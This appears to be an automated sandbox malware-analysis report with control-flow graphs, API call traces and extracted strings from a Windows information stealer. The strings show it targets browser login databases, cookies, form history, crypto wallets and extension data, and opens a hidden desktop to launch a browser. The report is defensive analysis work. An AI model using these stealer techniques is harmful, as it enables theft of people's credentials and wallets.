410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA 1009->1019 1021 408f24-408fee memset call 410530 lstrcatA call 410530 lstrcatA * 2 call 410530 * 2 call 410200 * 4 1011->1021 1022 40885d-40886b 1011->1022 1202 408bf0-408c13 call 410530 * 2 CopyFileA 1013->1202 1226 408e16-408e32 call 410200 call 4076b0 1019->1226 1227 408f19-408f1f 1019->1227 1021->1163 1022->874 1032 408871-40890d call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 1022->1032 1222 408910-40891f call 410530 CopyFileA 1032->1222 1097 4089fd 1096->1097 1097->989 1178 40939c-40939e 1163->1178 1165->992 1178->1097 1229 408c15-408c39 call 410200 call 411d20 Sleep 1202->1229 1230 408c4a-408c75 call 410200 call 4076b0 1202->1230 1242 408925-40894d call 410200 call 411d20 call 410530 1222->1242 1243 4091cd-4091f8 call 410200 call 4076b0 1222->1243 1260 408e37-408e3b 1226->1260 1233 4091b0-4091bc call 410530 DeleteFileA call 4104e0 1227->1233 1229->1202 1264 408c3b-408c45 call 410290 1229->1264 1268 4093b8 1230->1268 1269 408c7b-408d2b call 410340 call 410200 * 4 call 413e50 call 410230 1230->1269 1273 4091c1-4091c8 call 410230 1233->1273 1249 4091a4-4091aa 1239->1249 1250 4090cf-40919f call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1239->1250 1242->1222 1286 4093a3-4093a5 1243->1286 1287 4091fe-4092a8 call 410340 call 410200 * 4 call 413e50 call 410230 1243->1287 1249->1233 1250->1249 1270 408e41-408f0e call 410340 call 4102e0 call 410340 call 410200 * 4 call 413e50 call 410230 * 3 1260->1270 1271 408f13 1260->1271 1264->1230 1276 4093bf-4093c6 call 410230 1268->1276 1269->1276 1270->1271 1271->1227 1273->1097 1276->874 1297 4093ac-4093b3 call 410230 1286->1297 1287->1297 1297->874 1306->1307 1307->970
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 004081D9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,0042150A,0042150A,?,?,0042119A,?,?,0042150A,?), ref: 00408268
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408311
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00408344
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040839B
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 004083CC
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040842F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcatlstrlenmemcmpstrlen$??3@EnvironmentExpandFileFindFirstStringsmemmove
                                                                                                                                                                                                                                                                                      • String ID: --remote-debugging-port=9223 --profile-directory="$Brave$C:\ProgramData\$CURRENT$Cookies$History$IndexedDB$Local Extension Settings$Login Data$Network$Opera$Opera Crypto$Opera GX$Sync Extension Settings$Wallets$Web Data$\BraveWallet\Preferences$_0.indexeddb.leveldb$_cookies.db$_formhistory.db$_history.db$_key4.db$_logins.json$_webdata.db$chrome-extension_$cookies.sqlite$formhistory.sqlite$places.sqlite
                                                                                                                                                                                                                                                                                      • API String ID: 664854069-3644845557
                                                                                                                                                                                                                                                                                      • Opcode ID: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                                      • Instruction ID: 4855d12272032d1875a7082c41d92aaf51c32be0ad940928e656d1a7aac375ca
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c4c13cee421c7050bc34002db25b6abb8c2bc4e772ac01028f81aeeca01f54a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FB2A331A006199BCB10EFA1CD95AEEB779BF48304F40419EF8056B192DF78AEC5CB95
                                                                                                                                                                                                                                                                                      Function 00413FF0 Relevance: 68.9, APIs: 31, Strings: 8, Instructions: 667stringfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 2248 413ff0-41405d call 41e9b0 wsprintfA FindFirstFileA memset * 2 2251 4146b1-4146d7 call 410230 * 4 2248->2251 2252 414063-414081 2248->2252 2279 4146da-4146e2 call 410230 2251->2279 2253 4140ae-4140e2 call 402400 2252->2253 2260 414100 2253->2260 2261 4140e4-4140ef strlen 2253->2261 2263 414102-414111 2260->2263 2261->2263 2265 414150-414154 2263->2265 2266 414113-414120 2263->2266 2267 414245-414251 2265->2267 2268 41415a-41418e call 402400 2265->2268 2270 414122 2266->2270 2271 414128-414135 memcmp 2266->2271 2274 414253-414265 2267->2274 2275 414299-41429b 2267->2275 2287 414190-4141a1 strlen 2268->2287 2288 4141a3 2268->2288 2270->2271 2271->2268 2276 414137-414139 2271->2276 2280 414290-414296 ??3@YAXPAX@Z 2274->2280 2281 414267-414269 2274->2281 2282 4142a1-4142d6 wsprintfA StrCmpCA 2275->2282 2283 414090-4140a8 FindNextFileA 2275->2283 2276->2268 2277 41413b-41413d 2276->2277 2277->2267 2286 414143 2277->2286 2279->2251 2280->2275 2291 4146e4-41474f _invalid_parameter_noinfo_noreturn call 410530 * 2 GetLogicalDriveStringsA 2281->2291 2292 41426f-414274 2281->2292 2284 4142d8-4142ed 2282->2284 2285 4142ef-414306 2282->2285 2283->2253 2289 4146a8-4146ab FindClose 2283->2289 2303 414309-414335 memset lstrcatA 2284->2303 2285->2303 2286->2268 2293 4141a5-4141b4 2287->2293 2288->2293 2289->2251 2335 414755-414785 2291->2335 2336 414a0e-414a68 call 410230 * 8 2291->2336 2292->2291 2295 41427a-41427f 2292->2295 2299 4141e0-4141e7 2293->2299 2300 4141b6-4141c3 2293->2300 2295->2291 2301 414285-414288 2295->2301 2307 4141e9-4141ec 2299->2307 2308 4141ef-4141fd 2299->2308 2304 4141c5 2300->2304 2305 4141cb-4141de memcmp 2300->2305 2301->2291 2306 41428e 2301->2306 2309 414340-41434a strtok_s 2303->2309 2304->2305 2305->2299 2305->2308 2306->2280 2307->2308 2308->2267 2311 4141ff-414211 2308->2311 2314 414370-41439a memset lstrcatA 2309->2314 2315 41434c-41435e 2309->2315 2312 414213-414215 2311->2312 2313 41423c-414242 ??3@YAXPAX@Z 2311->2313 2312->2291 2318 41421b-414220 2312->2318 2313->2267 2319 4143c8-4143d2 strtok_s 2314->2319 2321 4145a0-4145a7 2315->2321 2329 414364-41436c 2315->2329 2318->2291 2320 414226-41422b 2318->2320 2319->2321 2322 4143d8-4143e2 PathMatchSpecA 2319->2322 2320->2291 2326 414231-414234 2320->2326 2321->2283 2324 4145ad-4145b9 2321->2324 2327 4143e4-4144b9 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 DeleteFileA call 410530 CopyFileA call 410530 call 411b80 call 41e900 2322->2327 2328 4143bd-4143c6 2322->2328 2324->2289 2330 4145bf-4145c6 2324->2330 2326->2291 2332 41423a 2326->2332 2419 4143a0-4143b7 call 410530 DeleteFileA call 410230 2327->2419 2420 4144bf-4144ce 2327->2420 2328->2319 2329->2309 2330->2283 2334 4145cc-41469b call 410200 * 4 call 413ff0 2330->2334 2332->2313 2375 4146a0-4146a3 2334->2375 2339 414790-4148e8 memset GetDriveTypeA call 410530 call 4119b0 lstrcpyA call 410530 * 3 call 410200 * 4 call 413ff0 2335->2339 2407 4148ed-414900 lstrlenA 2339->2407 2375->2283 2407->2339 2409 414906 2407->2409 2409->2336 2419->2328 2420->2279 2421 4144d4-4144f0 call 410200 call 4076b0 2420->2421 2429 4144f5-4144fc 2421->2429 2430 414502-414592 call 4101c0 call 410200 * 4 call 413e50 call 410230 2429->2430 2431 414597-41459e call 410230 2429->2431 2430->2431 2431->2321
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414012
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,-000000C0,-000000CC,-000000D8), ref: 00414023
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00414039
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041404F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004140E5
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00000000,00000000), ref: 0041412B
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00414197
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002), ref: 004141D4
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002), ref: 0041423D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: memcmpmemsetstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$%s\%s\%s$%s\*.*$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$C:\ProgramData\$Files
                                                                                                                                                                                                                                                                                      • API String ID: 330858031-1484801792
                                                                                                                                                                                                                                                                                      • Opcode ID: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                      • Instruction ID: 5e360f460fbcca21e162eb574f6fd90f09ecfb201c8315115846ffce7b56cf4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85359c954f35e407cbf01df20d7615a727ed75f97d4295e79f40369c1520ae8c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB42D471E00618ABDB10DF65CC85BEEB7B4BF58304F00419AF915A7252EB78AAC4CF94
                                                                                                                                                                                                                                                                                      Function 00407060 Relevance: 44.2, APIs: 19, Strings: 6, Instructions: 448stringsleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 3205 407060-407087 3206 407096 3205->3206 3207 407089-407094 strlen 3205->3207 3208 407098-40709d 3206->3208 3207->3208 3209 4070d6-4070e8 call 40f390 3208->3209 3210 40709f-4070a2 3208->3210 3218 4070f5 3209->3218 3219 4070ea-4070f3 strlen 3209->3219 3212 4070a4-4070a9 3210->3212 3213 407109-40714a call 402510 memcpy OpenDesktopA 3210->3213 3215 4070b5-4070c0 call 40eca0 3212->3215 3216 4070ab-4070b3 call 402520 3212->3216 3226 40716c-40721f call 407660 call 411550 call 410530 call 4119b0 lstrcpyA call 410230 call 411fa0 3213->3226 3227 40714c-407166 CreateDesktopA 3213->3227 3215->3209 3228 4070c2-4070c8 3215->3228 3216->3228 3224 4070f7-407106 call 406b00 3218->3224 3219->3224 3245 407221-40722a strlen 3226->3245 3246 40722c 3226->3246 3227->3226 3231 4070ca 3228->3231 3232 4070cc-4070d3 3228->3232 3231->3232 3232->3209 3247 40722e-40723f call 402400 3245->3247 3246->3247 3250 407264-40726c call 406fe0 3247->3250 3253 40727b-407283 3250->3253 3254 40726e-407274 3250->3254 3257 407285-407294 3253->3257 3258 4072c8-4072e5 3253->3258 3255 407250-407262 call 411fa0 Sleep 3254->3255 3256 407276-407279 3254->3256 3255->3250 3255->3253 3256->3255 3261 407296-407298 3257->3261 3262 4072bf-4072c5 ??3@YAXPAX@Z 3257->3262 3260 407303-40734c CreateProcessA 3258->3260 3264 4074c2-4074df 3260->3264 3265 407352-4073e2 Sleep call 410200 * 4 call 406bc0 3260->3265 3266 40764d-407652 _invalid_parameter_noinfo_noreturn 3261->3266 3267 40729e-4072a3 3261->3267 3262->3258 3269 4074e1-4074e7 strlen 3264->3269 3270 4074ea-40750f call 402400 call 406b00 3264->3270 3292 4073e7-4073ec 3265->3292 3267->3266 3271 4072a9-4072ae 3267->3271 3269->3270 3283 407511-40751a strlen 3270->3283 3284 40751c-407559 call 406b00 * 2 call 4101c0 3270->3284 3271->3266 3274 4072b4-4072b7 3271->3274 3274->3266 3277 4072bd 3274->3277 3277->3262 3283->3284 3301 40755b 3284->3301 3302 40755e-4075d3 call 4101c0 * 2 call 410200 * 4 call 402910 3284->3302 3293 4073f2-407412 call 411fa0 3292->3293 3294 40760c-40760f call 412050 3292->3294 3304 407420 3293->3304 3305 407414-40741d strlen 3293->3305 3299 407614-40761d CloseDesktop 3294->3299 3303 407622-40764a call 410230 * 4 3299->3303 3301->3302 3348 4075d5-4075e4 3302->3348 3349 407608-40760a 3302->3349 3308 407422-407430 call 402400 3304->3308 3305->3308 3317 407454-40745c call 406fe0 3308->3317 3326 407470-407479 3317->3326 3327 40745e-407464 3317->3327 3330 4072f9-4072fd 3326->3330 3331 40747f-40748e 3326->3331 3333 407440-407452 call 411fa0 Sleep 3327->3333 3334 407466-407469 3327->3334 3330->3260 3330->3299 3336 4072f0-4072f6 ??3@YAXPAX@Z 3331->3336 3337 407494-407496 3331->3337 3333->3317 3333->3326 3334->3333 3336->3330 3337->3266 3340 40749c-4074a1 3337->3340 3340->3266 3343 4074a7-4074ac 3340->3343 3343->3266 3345 4074b2-4074b5 3343->3345 3345->3266 3347 4074bb-4074bd 3345->3347 3347->3336 3350 4075e6-4075e8 3348->3350 3351 4075ff-407605 ??3@YAXPAX@Z 3348->3351 3349->3303 3350->3266 3352 4075ea-4075ef 3350->3352 3351->3349 3352->3266 3353 4075f1-4075f6 3352->3353 3353->3266 3354 4075f8-4075fb 3353->3354 3354->3266 3355 4075fd 3354->3355 3355->3351
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ECA0: memcpy.MSVCRT(?,00000010,?,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E), ref: 0040ECC1
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ECA0: ??3@YAXPAX@Z.MSVCRT(00000010,?,?,00000010,00406A4D,00000001,00000000,?,?,00000000,00000000,00000000,?,0040D83E,00000000,?), ref: 0040ECF3
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                      • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: strlen$Desktopmemcpy$??3@CreateOpenSleeplstrcpy
                                                                                                                                                                                                                                                                                      • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA$_CreateProcess$cookies
                                                                                                                                                                                                                                                                                      • API String ID: 509579932-957743217
                                                                                                                                                                                                                                                                                      • Opcode ID: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                      • Instruction ID: 88d1e3b40fbcb0df37290dc8620aa57b8ac853b7570111a731a950e539c68a8a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25b604c1d987f4309f2292e5dfc1b2e03b5b8293f16c39f96c9129eb1a5b4d54
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69F1F431D046049BDB11EF64CD81BEEB7B0AF45304F00456EF90677292EB79A9C5CB9A
                                                                                                                                                                                                                                                                                      Function 00401730 Relevance: 39.5, APIs: 17, Strings: 5, Instructions: 968filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
